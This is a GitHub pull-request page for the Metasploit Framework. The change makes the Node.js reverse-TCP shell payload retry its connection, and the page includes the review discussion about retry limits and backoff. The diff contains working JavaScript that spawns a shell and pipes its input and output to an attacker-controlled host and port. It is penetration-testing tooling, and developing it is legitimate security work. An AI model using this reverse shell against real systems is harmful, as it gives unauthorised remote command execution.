Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Enhancing the functionality on the nodejs shell_reverse_tcp payload. #9077

Merged
merged 6 commits into from Oct 16, 2017
Merged

Enhancing the functionality on the nodejs shell_reverse_tcp payload. #9077

Show file tree
Hide file tree
Changes from 2 commits
Commits
Show all changes
6 commits
Select commit Hold shift + click to select a range
763720c
Merge pull request #6 from rapid7/master
itsmeroy2012 Oct 11, 2017
374c139
Increasing the functionality of the nodejs shell_reverse_tcp payload
itsmeroy2012 Oct 12, 2017
a0abffb
Adding functionality of StagerRetryWait and StagerRetryCount
itsmeroy2012 Oct 12, 2017
6df8c40
adjust whitespace 'no tabs' more reabable
jmartin-tech Oct 13, 2017
b8d0986
Merge pull request #7 from jmartin-r7/adjust_9077_whitespace
itsmeroy2012 Oct 14, 2017
9afc8b5
Updating the payload sizes
itsmeroy2012 Oct 14, 2017
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Jump to
Jump to file
Failed to load files.
Diff view
Diff view
26 changes: 16 additions & 10 deletions lib/msf/core/payload/nodejs.rb
View file
Open in desktop
Expand Up @@ -56,16 +56,22 @@ def nodejs_reverse_tcp(opts={})
util = require("util"),
sh = cp.spawn(cmd, []);
var client = this;
client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
function StagerRepeat(){
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Whitespace and style here is all over the place, note: "Metasploit requires spaces instead of hard tabs"

See https://github.com/rapid7/metasploit-framework/wiki/Style-Tips

I have offered a PR that I believe ends up a bit more readable and replace the hard tabs. @itsmeroy2012 take a look and merge if you are good with adjustments. I can complete testing and get this merged soon.

itsmeroy2012#7

client.socket = net.connect(#{datastore['LPORT']}, "#{lhost}", #{tls_hash} function() {
client.socket.pipe(sh.stdin);
if (typeof util.pump === "undefined") {
sh.stdout.pipe(client.socket);
sh.stderr.pipe(client.socket);
} else {
util.pump(sh.stdout, client.socket);
util.pump(sh.stderr, client.socket);
}
});
socket.on("error", function(error) {
StagerRepeat();
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

MaxRetries should be taken into account, this will loop ad nauseum.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The loop runs like around 30+ times per second. If a MaxRetry value is specified, it will have to be in the range of ten thousands to keep the payload running for just a couple of minutes. @sempervictus

Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

This is doing a connect outbound, so having a backoff at the least should be added, a MaxRetry could then be set to a reasonable value as well.

Each StagerRepeat() can be called at least a few seconds apart and multiple failures in a row should extend the delay.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I'm not very well accustomed to the nodejs predefined functions. Is there a similar function like time.sleep() in node as there is in python? @jmartin-r7 @sempervictus

});
}
StagerRepeat();
})();
EOS
cmd.gsub("\n",'').gsub(/\s+/,' ').gsub(/[']/, '\\\\\'')
Expand Down
2 changes: 1 addition & 1 deletion modules/payloads/singles/cmd/unix/reverse_nodejs.rb
View file
Open in desktop
Expand Up @@ -10,7 +10,7 @@

module MetasploitModule

CachedSize = 2423
CachedSize = 2823

include Msf::Payload::Single
include Msf::Payload::NodeJS
Expand Down
2 changes: 1 addition & 1 deletion modules/payloads/singles/nodejs/shell_reverse_tcp.rb
View file
Open in desktop
Expand Up @@ -13,7 +13,7 @@

module MetasploitModule

CachedSize = 601
CachedSize = 701

include Msf::Payload::Single
include Msf::Payload::NodeJS
Expand Down
2 changes: 1 addition & 1 deletion modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
View file
Open in desktop
Expand Up @@ -10,7 +10,7 @@

module MetasploitModule

CachedSize = 629
CachedSize = 729

include Msf::Payload::Single
include Msf::Payload::NodeJS
Expand Down